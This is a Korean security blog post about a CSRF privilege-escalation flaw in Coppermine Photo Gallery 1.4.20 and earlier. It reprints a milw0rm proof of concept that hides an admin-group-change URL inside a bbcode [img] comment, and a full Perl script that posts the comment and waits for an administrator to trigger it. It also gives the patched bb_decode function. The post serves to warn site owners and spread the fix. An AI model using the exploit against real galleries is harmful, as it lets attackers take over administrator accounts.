이곳 홈페이지 갤러리로 이용되는 Coppermine Photo Gallery (이하 CPG)도 최근에 취약점이 계속 발표(?)되고 있습니다.
최근 웹사이트 공격 유형중 유행하는(?) CSRF (Cross-site request forgery) 취약점 입니다.
CSRF공격에는 bbcode의 이미지 링크기능이 사용되었고 실제 관리자가 로그인하면 특정 메세지가 보여진후
공격자에게 관리자 권한이 넘어가는 심각한 문제점이 발생합니다.
국내보다는 해외에서 더 많이 사용되기 때문에 국내에선 잠잠(?)한듯 하네요;
위 취약점이 발표되고 바로 공격 코드(perl)도 나왔군요.
출처 : http://www.milw0rm.com/exploits/8115
취약점 수정 방법 :
include/functions.inc.php파일 내의 bb_decode함수를 새로운 코드로 변경 하면 됩니다.
변경 내용은 아래를 참고하세요.
관련 링크 :
http://forum.coppermine-gallery.net/index.php/topic,58309.0.html
http://www.milw0rm.com/exploits/8114
http://www.milw0rm.com/exploits/8115
최근 웹사이트 공격 유형중 유행하는(?) CSRF (Cross-site request forgery) 취약점 입니다.
CSRF공격에는 bbcode의 이미지 링크기능이 사용되었고 실제 관리자가 로그인하면 특정 메세지가 보여진후
공격자에게 관리자 권한이 넘어가는 심각한 문제점이 발생합니다.
국내보다는 해외에서 더 많이 사용되기 때문에 국내에선 잠잠(?)한듯 하네요;
출처 : http://www.milw0rm.com/exploits/8114
붉은색의 "" 는 줄바꿈의 의미로 사용 되었습니다.
+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it
| http://coppermine-gallery.net
| Don't add me on msn messenger.
| This vulnerability can be named as "bbcode img tag script injection"
+--------------------------------------------------------------------------+
| Proof of Concept (an example,to understand it)
+--------------------------------------------------------------------------+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&
group=1&delete_files=no&delete_comments=no
[img]URL[/img]
+--------------------------------------------------------------------------+
| Modify [ID] with your user id.
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id]
+--------------------------------------------------------------------------+
Insert the below code into a new message
hey admin,nice web site :)
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&
delete_files=no&delete_comments=no[/img]
+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site"
| You'll become admin when the real admin will visit the page
+-------------------------------------------------------------------------+
위 취약점이 발표되고 바로 공격 코드(perl)도 나왔군요.
출처 : http://www.milw0rm.com/exploits/8115
붉은색의 "" 는 줄바꿈의 의미로 사용 되었습니다.
#!/usr/bin/perl
#inphex - inphex0 at gmail dot com
#based on http://milw0rm.com/exploits/8114 - found by StAkeR
#In case this does not work check out pos(Line 80) and find another value for it
use IO::Socket;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Cookies;
$_1 = shift; #[HOST]
$h = ($_1 eq ""?($n = 0):($n = 1));
$_2 = shift; #[PATH]
$_3 = shift; #[ID]
$_4 = shift; #[ALBUMNUM]
$_5 = shift; #[USER]
$_6 = shift; #[PASS]
$d_p = 80;
if (!$_1 || !$_2 ||!$_3 ||!$_4 ||!$_5 ||!$_6) {
print "perl coppermine host /path/ youruserid albumnum yourusername yourpasswordn";
print "perl coppermine host.com /path/ 3 2 inphex 123456";
exit;
}
if ($h) {
$socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => $_1, PeerPort => $d_p) or die("[-]ERROR");
print $socket "GET $_2 HTTP/1.1n";
print $socket "Host: $_1n";
print $socket "Accept: */*n";
print $socket "Connection: closenn";
while ($answer = <$socket>) {
$f_answer = $f_answer.$answer;
}
$url = &gen_url($_1,$_2,$_3);
if ($url) {
$code = &gen_code($url);
$res = &_send($_1,$_2,$_3,$_4,$code,$_5,$_6);
}
}
sub gen_url($$$) {
$h = shift;
$p = shift;
$i = shift;
$url = "http://".$_1.$_2."delete.php?id=u".$i."&u".$i."=&action=change_group&what=user&new_password=&
group=1&delete_files=no&delete_comments=no";
return $url;
}
sub gen_code($) {
$url = shift;
$code = "yoyoyo[img]".$url."[/img]";
return $code;
}
sub _send($$$$$$$) {
$h = "http://".shift;
$p = shift;
$i = shift;
$aid = shift;
$co = shift;
$u = shift;
$pass = shift;
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$login = $xpl->post($h.$p.'login.php?referer=index.php',
Content => [
"username" => $u,
"password" => $pass,
"submitted" => "Login",
],);
if($cookie_jar->as_string) {
$c = 1;
print "[+]Connectedn";
print "[+]Logged inn";
}else {
$c = 0;
}
if ($c) {
$con = get("".$h.$p."displayimage.php?album=".$aid."&pos=0"); #pos may be changed
if ($con =~m/addfav.php?pid=(.*?)&/) {
$p_id = $1;
}
}
$se = $xpl->post($h.$p.'db_input.php',Content_Type => 'form-data',
Content => [
'msg_author' => $u,
'msg_body' => $co,
'event' => 'comment',
'pid' => $p_id,
'submit' => "OK",
],);
print "[+]Comment sentn";
print "[/]Waiting for admin to viewn";
$| = 0;
while (1) {
sleep(20);
syswrite STDOUT,"-";
$xpl1 = LWP::UserAgent->new() or die;
$cookie_jar1 = HTTP::Cookies->new();
$xpl1->cookie_jar( $cookie_jar1 );
$_con = get("".$h.$p."logout.php?referer=index.php");
$login = $xpl1->post($h.$p.'login.php?referer=index.php',
Content => [
"username" => $u,
"password" => $pass,
"submitted" => "Login",
],);
$const = $xpl1->get($h.$p."index.php");
if ($const->as_string =~m/Config/) {
print "n[+]You just gained Admin Privileges";
exit;
}
}
}
취약점 수정 방법 :
include/functions.inc.php파일 내의 bb_decode함수를 새로운 코드로 변경 하면 됩니다.
변경 내용은 아래를 참고하세요.
// Allow the use of a limited set of phpBB bb codes in albums and image descriptions
// Based on phpBB code
/**
* bb_decode()
*
* @param $text
* @return
**/
function bb_decode($text)
{
$text = nl2br($text);
static $bbcode_tpl = array();
static $patterns = array();
static $replacements = array();
// First: If there isn't a "[" and a "]" in the message, don't bother.
if ((strpos($text, "[") === false || strpos($text, "]") === false)) {
return $text;
}
// [b] and [/b] for bolding text.
$text = str_replace("[b]", '<b>', $text);
$text = str_replace("[/b]", '</b>', $text);
// [u] and [/u] for underlining text.
$text = str_replace("[u]", '<u>', $text);
$text = str_replace("[/u]", '</u>', $text);
// [i] and [/i] for italicizing text.
$text = str_replace("[i]", '<i>', $text);
$text = str_replace("[/i]", '</i>', $text);
// colors
$text = preg_replace("/[color=(#[0-9A-F]{6}|[a-z]+)]/", '<span style="color:$1">', $text);
$text = str_replace("[/color]", '</span>', $text);
// [i] and [/i] for italicizing text.
//$text = str_replace("[i:$uid]", $bbcode_tpl['i_open'], $text);
//$text = str_replace("[/i:$uid]", $bbcode_tpl['i_close'], $text);
if (!count($bbcode_tpl)) {
// We do URLs in several different ways..
// **** WARNING *******************************************************
// The [url] tag can be used for a serious attack against your website.
// So [url] tags are no longer processed to show links.
// This simple action here is not an ideal solution but is necessary.
// Now, [url] tags are processed as follows:
// [url=link]text[/url] shows 'text' with a dummy image for the link.
// [url]link[/url] shows 'link' as plain text with a dummy image.
// The following line is the original line that processed [url]:
// $bbcode_tpl['url'] = '<span class="bblink"><a href="{URL}" rel="external">{DESCRIPTION}</a></span>';
// ********************************************************************
// See this thread on the Coppermine forum for more information:
// http://forum.coppermine-gallery.net/index.php/topic,58309.0.html
// Please read this thread carefully before deciding to process [url].
// ********************************************************************
$url_removed = '{URL}'; // put the image URL in the tooltip/mouse-over
$bbcode_tpl['url'] = '{DESCRIPTION}<img src="images/descending.gif" alt="" title="' . $url_removed . '" />';
$bbcode_tpl['email'] = '<span class="bblink"><a href="mailto:{EMAIL}">{EMAIL}</a></span>';
$bbcode_tpl['url1'] = str_replace('{URL}', '\1\2', $bbcode_tpl['url']);
$bbcode_tpl['url1'] = str_replace('{DESCRIPTION}', '\1\2', $bbcode_tpl['url1']);
$bbcode_tpl['url2'] = str_replace('{URL}', 'http://\1', $bbcode_tpl['url']);
$bbcode_tpl['url2'] = str_replace('{DESCRIPTION}', '\1', $bbcode_tpl['url2']);
$bbcode_tpl['url3'] = str_replace('{URL}', '\1\2', $bbcode_tpl['url']);
$bbcode_tpl['url3'] = str_replace('{DESCRIPTION}', '\3', $bbcode_tpl['url3']);
$bbcode_tpl['url4'] = str_replace('{URL}', 'http://\1', $bbcode_tpl['url']);
$bbcode_tpl['url4'] = str_replace('{DESCRIPTION}', '\2', $bbcode_tpl['url4']);
$bbcode_tpl['email'] = str_replace('{EMAIL}', '\1', $bbcode_tpl['email']);
// [url]xxxx://www.phpbb.com[/url] code..
$patterns[1] = "#[url]([a-z]+?://){1}([a-z0-9-.,?!%*_#:;~\&$@/=+()]+)[/url]#si";
$replacements[1] = $bbcode_tpl['url1'];
// [url]www.phpbb.com[/url] code.. (no xxxx:// prefix).
$patterns[2] = "#[url]([a-z0-9-.,?!%*_#:;~\&$@/=+()]+)[/url]#si";
$replacements[2] = $bbcode_tpl['url2'];
// [url=xxxx://www.phpbb.com]phpBB[/url] code..
$patterns[3] = "#[url=([a-z]+?://){1}([a-z0-9-.,?!%*_#:;~\&$@/=+()]+)](.*?)[/url]#si";
$replacements[3] = $bbcode_tpl['url3'];
// [url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix).
$patterns[4] = "#[url=([a-z0-9-.,?!%*_#:;~\&$@/=+()]+)](.*?)[/url]#si";
$replacements[4] = $bbcode_tpl['url4'];
// [email]user@domain.tld[/email] code..
$patterns[5] = "#[email]([a-z0-9-_.]+?@[w-]+.([w-.]+.)?[w]+)[/email]#si";
$replacements[5] = $bbcode_tpl['email'];
// [img]xxxx://www.phpbb.com[/img] code..
// **** WARNING *******************************************************
// The [img] tag can be used for a serious attack against your website.
// So [img] tags are no longer processed to show the specified images.
// This simple action here is not an ideal solution but is necessary.
// Now [img] tags will show a dummy image instead as a placeholder.
// ********************************************************************
// The following line is the original line that processed [img]:
// $bbcode_tpl['img'] = '<img src="{URL}" alt="" />';
// ********************************************************************
// See this thread on the Coppermine forum for more information:
// http://forum.coppermine-gallery.net/index.php/topic,58309.0.html
// Please read this thread carefully before deciding to process [img].
// ********************************************************************
$img_removed = '{URL}'; // put the image URL in the tooltip/mouse-over
$bbcode_tpl['img'] = '<img src="images/thumbnails.gif" alt="" title="' . $img_removed . '" />';
$bbcode_tpl['img'] = str_replace('{URL}', '\1\2', $bbcode_tpl['img']);
$patterns[6] = "#[img]([a-z]+?://){1}([a-z0-9-.,?!%*_#:;~\&$@/=+()]+)[/img]#si";
$replacements[6] = $bbcode_tpl['img'];
}
$text = preg_replace($patterns, $replacements, $text);
return $text;
}
관련 링크 :
http://forum.coppermine-gallery.net/index.php/topic,58309.0.html
http://www.milw0rm.com/exploits/8114
http://www.milw0rm.com/exploits/8115
'Security' 카테고리의 다른 글
Break-In attempt on www.centos.org (0) | 2009.07.06 |
---|---|
XpressEngine 1.2.1 이하 모든 버전의 파일 다운로드 관련 보안 패치 (0) | 2009.04.16 |
ZeroBoard4 pl8 (07.12.17) Multiple Remote/Local Vulnerability (0) | 2009.02.12 |
ZeroBoardXE 1.1.5 (09.01.22) XSS Vulnerability (1) | 2009.02.11 |
GNUBoard V4.31.03 (08.12.29) Local/Remote File Include Vulnerability (0) | 2009.01.23 |